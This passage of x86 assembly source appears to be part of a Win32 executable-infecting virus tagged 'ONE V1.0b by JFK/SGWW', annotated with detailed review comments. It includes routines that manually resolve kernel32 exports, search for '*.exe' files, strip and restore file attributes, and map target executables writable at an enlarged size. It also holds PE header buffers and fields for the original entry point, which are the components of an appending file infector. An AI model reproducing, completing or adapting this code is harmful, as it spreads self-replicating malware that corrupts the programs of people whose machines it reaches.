ret
SetNOAttribs ENDP
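;**** MapFile ****
;Creates a file-mapping object over the file whose handle is in
;OpenFileHandle, sized from SizeOfHost rather than from the file's own
;length, then maps a read/write view of the whole object.
;SizeOfHost is described in the data area as "size needed", so it may
;exceed the current file length; with PAGE_READWRITE the Win32 API
;contract is that CreateFileMapping then extends the file to that size.
;In:  [ebp+OpenFileHandle]      handle from OpenFile (read+write)
;     [ebp+SizeOfHost]          mapping size in bytes
;     [ebp+lpfCreateFileMappingA], [ebp+lpfMapViewOfFile]
;Out: [ebp+MappedObjectHandle]  mapping handle (written only when
;                               CreateFileMappingA succeeds)
;     [ebp+MapBaseAddr]         view base address, or 0 on failure
;     EAX = view base on success, 0 on either failure
;     CF  = 0 on success, 1 on error
;Clobbers: EAX, flags.
;NOTE(review): when MapViewOfFile fails the mapping object created just
;before is NOT closed here; the caller must close MappedObjectHandle.
;The failure path is local to this PROC (previously it jumped into
;OpenFile's body for its STC/RET, which tied the two PROCs together).
MapFile PROC
;Create the file-mapping object.
push 0 ;lpName: anonymous mapping.
push dword ptr [ebp+SizeOfHost] ;dwMaximumSizeLow: size of the object.
push 0 ;dwMaximumSizeHigh.
push PAGE_READWRITE ;flProtect: the file is modified through the view.
push 0 ;lpAttributes: default security.
push dword ptr [ebp+OpenFileHandle] ;hFile: the OPEN file.
call [ebp+lpfCreateFileMappingA]
test eax, eax ;NULL means failure.
jz MF_Failed
mov [ebp+MappedObjectHandle], eax ;Keep the handle for UnmapViewOfFile/CloseHandle.
;Map a view of the entire object from offset 0.
push 0 ;dwNumberOfBytesToMap: 0 = up to the end of the mapping.
push 0 ;dwFileOffsetLow.
push 0 ;dwFileOffsetHigh.
push FILE_MAP_WRITE ;read+write view (write implies read).
push eax ;hFileMappingObject.
call [ebp+lpfMapViewOfFile]
;MapViewOfFile returns a base ADDRESS, not a handle. The pages are
;demand-paged: file contents are brought in transparently on first
;access, so a debugger shows "empty" memory until something touches
;it. That is normal behaviour, not a failure.
mov [ebp+MapBaseAddr], eax ;0 on failure, base address otherwise.
test eax, eax
jz MF_Failed
clc ;Success: CF = 0, EAX = base address.
ret
MF_Failed:
stc ;Error: CF = 1, EAX = 0.
ret
MapFile ENDP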
;**** RestoreAttribs ****
;Writes the attribute value saved in OrigFileAttribs back onto the file
;named in FoundFileData (WFD_szFileName) with SetFileAttributesA.
;In:  [ebp+OrigFileAttribs], [ebp+FoundFileData.WFD_szFileName],
;     [ebp+lpfSetFileAttributesA]
;Out: EAX = SetFileAttributesA return value (non-zero on success).
;     The carry flag is NOT set on error; callers must inspect EAX.
;Clobbers: EAX, flags.
RestoreAttribs PROC
push dword ptr [ebp+OrigFileAttribs] ;dwFileAttributes: the saved value.
lea eax, [ebp+FoundFileData.WFD_szFileName]
push eax ;lpFileName: the found file's name.
call [ebp+lpfSetFileAttributesA]
ret
RestoreAttribs ENDP
;**** OpenFile ****
;Opens the file named in FoundFileData for reading AND writing, with no
;sharing (dwShareMode = 0), via CreateFileA with OPEN_EXISTING so the
;file is never created.
;In:  [ebp+FoundFileData.WFD_szFileName], [ebp+lpfCreateFileA]
;Out: [ebp+OpenFileHandle] = handle (written only on success)
;     EAX = handle, or INVALID_HANDLE_VALUE (-1) on failure
;     CF  = 0 on success, 1 on failure
;Clobbers: EAX, flags.
;Keep the OF_Failed label name: other PROCs in this file may jump to it
;for its STC/RET.
OpenFile PROC
push 0 ;hTemplateFile: none.
push FILE_ATTRIBUTE_NORMAL ;dwFlagsAndAttributes.
push OPEN_EXISTING ;dwCreationDisposition: fail unless the file exists.
push 0 ;lpSecurityAttributes: default.
push 0 ;dwShareMode: 0 = exclusive, nobody else may open it.
push GENERIC_READ or GENERIC_WRITE ;dwDesiredAccess.
lea eax, [ebp+FoundFileData.WFD_szFileName]
push eax ;lpFileName.
call [ebp+lpfCreateFileA]
cmp eax, -1 ;INVALID_HANDLE_VALUE (0FFFFFFFFh)?
jne OF_Opened ;No: we have a usable handle.
OF_Failed:
stc ;Error: CF = 1.
ret
OF_Opened:
mov [ebp+OpenFileHandle], eax ;Remember the handle for MapFile/CloseFile.
clc ;Success: CF = 0.
ret
OpenFile ENDP
;**** CloseFile ****
;Releases the handle stored in OpenFileHandle with CloseHandle.
;The stored value is not cleared afterwards, so a second call would
;hand a stale handle to CloseHandle.
;In:  [ebp+OpenFileHandle], [ebp+lpfCloseHandle]
;Out: EAX = CloseHandle return value. CF is NOT set on error.
;Clobbers: EAX, flags.
CloseFile PROC
mov eax, [ebp+OpenFileHandle]
push eax ;hObject.
call [ebp+lpfCloseHandle]
ret
CloseFile ENDP
;**** AlignFix ****
;Rounds EAX up to the NEXT multiple of ECX, strictly above the current
;one: result = (EAX / ECX + 1) * ECX. A value that is already a
;multiple of ECX therefore still advances to the following boundary.
;In:  EAX = value (unsigned), ECX = alignment. ECX must be non-zero:
;     a zero divisor raises #DE on DIV.
;Out: EAX = rounded value (low 32 bits of the product).
;Clobbers: EDX (remainder of DIV, then high half of MUL), flags.
AlignFix PROC
xor edx, edx ;EDX:EAX = EAX, unsigned dividend.
div ecx ;EAX = EAX / ECX; EDX = remainder (discarded).
add eax, 1 ;One boundary past the quotient.
mul ecx ;EDX:EAX = EAX * ECX; EDX overflow is ignored.
ret
AlignFix ENDP
;**** ExtractAbsoluteAddress ****
;Compares a length-prefixed name against a candidate export name and,
;when they match, resolves that export's absolute address and stores it.
;Register inputs (inferred from use; the caller sets them up outside
;this view -- confirm against the call site):
;  ESI = pointer to a dword length followed by the name bytes
;  EDI = pointer to the candidate name to compare against
;  EBX = pointer to the export directory; [ebx+1Ch] is read as the RVA
;        of the function-address array (this is the AddressOfFunctions
;        offset of a PE export directory)
;  ECX = byte offset of the candidate's slot in that array
;  EAX = address of the dword that receives the resolved address
;Also reads [ebp+K32Base] (DLL load address) and [ebp+UnnamedOffset].
;On a match: [EAX-in] = K32Base + array entry; ESI ends up holding the
;  store address and EAX the old ESI (XCHG). EDX/EBX/ECX/EDI untouched.
;On no match: nothing is written; only ESI/EAX are... untouched too,
;  since POPAD restored everything before the branch.
;Flags: the branch uses ZF from REP CMPSB; POPAD does not alter flags.
;Caveat: exactly [ESI] bytes are compared, so the match is only exact
;  if the length includes the terminating NUL (the GetProcAddress entry
;  in the data area is stored that way). A zero length performs no
;  comparison and leaves whatever ZF was set before.
ExtractAbsoluteAddress PROC
pushad ;Save all registers; the compare below scratches ECX/ESI/EDI.
mov ecx, [esi] ;Byte count to compare (the length prefix).
add esi, 4 ;Skip the prefix; ESI now points at the name bytes.
rep cmpsb ;Compare ECX bytes at [ESI] and [EDI]; stops on first mismatch.
popad ;Restore everything (flags are preserved across POPAD).
jne EAA_NotString ;ZF=0: not this export, leave without writing.
xchg esi, eax ;ESI = where to store the address; EAX = old ESI (scratch).
mov eax, [ebx+1Ch] ;RVA of the export function-address array.
add eax, [ebp+UnnamedOffset] ;Extra offset into the array -- meaning not visible here, confirm at caller.
add eax, [ebp+K32Base] ;RVA -> VA using the DLL's load address.
add eax, ecx ;Select this export's slot.
mov eax, [eax] ;Fetch the export's RVA.
add eax, [ebp+K32Base] ;RVA -> absolute address.
mov [esi], eax ;Store it for the caller.
EAA_NotString:
ret
ExtractAbsoluteAddress ENDP
;**** MyGetProcAddress ****
;Resolves an export name through the real GetProcAddress, using the
;module handle stored in ModHandle.
;In:  EAX = lpProcName (pointer to a NUL-terminated name)
;     [ebp+ModHandle], [ebp+lpfGetProcAddress] (must hold a valid
;     function address by the time this runs)
;Out: EAX = resolved address, or 0 if not found
;     CF  = 1 on failure, 0 on success
;Clobbers: EAX, flags.
MyGetProcAddress PROC
push eax ;lpProcName.
push dword ptr [ebp+ModHandle] ;hModule.
call [ebp+lpfGetProcAddress]
test eax, eax ;NULL = not found (also leaves CF = 0).
jnz MGPA_Done ;Non-zero: success.
stc ;Signal failure to the caller.
MGPA_Done:
ret
MyGetProcAddress ENDP
; ****** DATA ******
;Everything here is reached as [ebp+Name]: EBP carries a delta offset so
;the code is position-independent (every PROC above uses that form).
;Layout matters -- several items are parsed in place (the length-prefixed
;GetProcAddress entry, the PE_Header buffer, the name/slot pairs of
;ImportTable), so do not reorder or resize them.
K32Base dd 0 ;Load address of KERNEL32 once found; added to RVAs.
UnnamedOffset dd 0 ;Extra offset applied to the export address array in ExtractAbsoluteAddress.
ModHandle dd 0BFF70000h ;Fixed hModule handed to GetProcAddress by MyGetProcAddress.
;NOTE(review): ModHandle is hard-coded, so the lookups only work where
;KERNEL32 really loads at that address (it looks like a Windows 9x base;
;NT-family systems load it elsewhere).
lpfGetProcAddress dd 15d ;Length prefix: 15 = strlen("GetProcAddress")+1, so the NUL is compared too. Holds the resolved address afterwards (see ExtractAbsoluteAddress).
db "GetProcAddress",0
FoundFileData WIN32_FIND_DATA ? ;Result of FindFirst/NextFile; WFD_szFileName is the name that gets opened and re-attributed.
lpsExeFiles db '*.exe',0 ;Search pattern: only .exe files are targeted.
OldEA dd 0 ;Original entry point, absolute (NOT an RVA).
OldPhysSize dd 0 ;Previous physical size of the last section ("object").
FoundFileHandle dd 0 ;Search handle from FindFirstFileA.
OpenFileHandle dd 0 ;Handle from OpenFile; used by MapFile and CloseFile.
MappedObjectHandle dd 0 ;File-mapping handle created in MapFile.
OrigFileAttribs dd 0 ;Attributes saved before the file is touched; restored by RestoreAttribs.
DataFromFile dd 0 ;Scratch dword read from the file.
FileBytesRead dd 0 ;Byte count returned by ReadFile.
MapBaseAddr dd 0 ;View base from MapViewOfFile (0 when the map failed).
SizeOfHost dd 0 ;Size passed to CreateFileMappingA as the mapping size.
PE_Header: ;54h-byte buffer for the start of a target's PE headers.
;The names are the old Microsoft "object" terminology; the offsets line
;up with IMAGE_NT_HEADERS32 from the signature through SizeOfImage.
Sig_Bytes: dd 0 ;+00 "PE\0\0" signature.
CPU_Type: dw 0 ;+04 Machine.
NumbOfObjects dw 0 ;+06 NumberOfSections.
TimeStamp dd 0 ;+08 TimeDateStamp.
Reserved1 dd 0 ;+0C PointerToSymbolTable.
Reserved2 dd 0 ;+10 NumberOfSymbols.
NT_HDR_Size dw 0 ;+14 SizeOfOptionalHeader.
Flags dw 0 ;+16 Characteristics.
Reserved3 dw 0 ;+18 optional header Magic.
LMajor db 0 ;+1A MajorLinkerVersion.
LMinor db 0 ;+1B MinorLinkerVersion.
Reserved4 dd 0 ;+1C SizeOfCode.
Reserved5 dd 0 ;+20 SizeOfInitializedData.
Reserved6 dd 0 ;+24 SizeOfUninitializedData.
EntryPointRVA dd 0 ;+28 AddressOfEntryPoint (RVA).
Reserved7 dd 0 ;+2C BaseOfCode.
Reserved8 dd 0 ;+30 BaseOfData.
ImageBase dd 0 ;+34 ImageBase.
ObjectAlign dd 0 ;+38 SectionAlignment.
FileAlign dd 0 ;+3C FileAlignment.
OS_Major dw 0 ;+40 MajorOperatingSystemVersion.
OS_Minor dw 0 ;+42 MinorOperatingSystemVersion.
UserMajor dw 0 ;+44 MajorImageVersion.
UserMinor dw 0 ;+46 MinorImageVersion.
SubSysMajor dw 0 ;+48 MajorSubsystemVersion.
SubSysMinor dw 0 ;+4A MinorSubsystemVersion.
Reserved9 dd 0 ;+4C Win32VersionValue.
ImageSize dd 0 ;+50 SizeOfImage; the buffer ends at +54h.
ObjectTable: db 240d dup (0) ;Six section headers at 40 bytes each.
ImportTable: ;Name/slot pairs: each NUL-terminated API name is followed by the dword that receives its address. Presumably filled by walking these pairs with MyGetProcAddress -- the loop is not in this view.
db 'FindFirstFileA',0
lpfFindFirstFileA dd 0
db 'FindNextFileA',0
lpfFindNextFileA dd 0
db 'GetFileAttributesA',0
lpfGetFileAttributesA dd 0
db 'SetFileAttributesA',0
lpfSetFileAttributesA dd 0
db 'CreateFileA',0
lpfCreateFileA dd 0
db 'SetFilePointer',0
lpfSetFilePointer dd 0
db 'ReadFile',0
lpfReadFile dd 0
db 'GetFileSize',0
lpfGetFileSize dd 0
db 'CreateFileMappingA',0
lpfCreateFileMappingA dd 0
db 'MapViewOfFile',0
lpfMapViewOfFile dd 0
db 'UnmapViewOfFile',0
lpfUnmapViewOfFile dd 0
db 'CloseHandle',0
lpfCloseHandle dd 0
lpsSig db '-=[ONE V1.0b by JFK/SGWW]=-' ;Author/version tag, no terminating NUL; how it is used is not visible in this view.
v_end: ;End of the body; paired with v_start in the END directive.
end v_start